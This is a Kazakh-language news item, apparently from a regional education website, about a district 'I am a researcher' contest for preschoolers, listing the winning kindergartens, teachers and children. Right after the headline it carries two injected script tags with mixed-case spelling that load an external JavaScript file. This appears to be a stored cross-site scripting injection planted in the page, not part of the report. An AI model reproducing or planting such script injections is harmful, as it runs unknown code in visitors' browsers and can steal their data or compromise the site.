Мектеп жасына дейінгі балаларға арналған "Мен зерттеушімін" аудандық конкурсын өткізу туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.04.2022

25 сәуір күні мектеп жасына дейінгі балаларға арналған «Мен зерттеушімін» атты аудандық байқау өткізілді. Байқауға 8 балабақша қатысты. Мектепке дейінгі ұйымдардың жеке қатысушылары мен шығармашылық ұжымдары конкурсқа қатысуға жіберілді.

Конкурс нәтижесі бойынша 1 орын Ақмол ауылының МКҚК «Жұлдыз» балабақшасының «Теремок» мектепалды даярлық тобының тәрбиешісі -Фомкина Лидия Борисовна мен тәрбиеленушісі Мурашкевич Валерияға берілді және «Мен зерттеушімін» байқауына облыстық кезеңіне қатысуға жіберілді.

2 орын Талапкер ауылының МКҚК «Әсем-Ай» балабақшасының «Еркемай» мектепалды даярлық тобының тәрбиешісі - Таменова Жанар Ильясқызы және тәрбиеленушісі Асанбай Набиге берілді.

3 - орынға Қажымұқан ауылының МКҚК «Қошақан» балабақшасының тәрбиеші Закариянова Сұлушаш Сәбитқызы және «Балапан» ересектер тобының тәрбиеленушілері ие болды.

Құттықтаймыз!

Просмотров: 1387


Пікір қосу



Деректерді қолтаңбаға қосу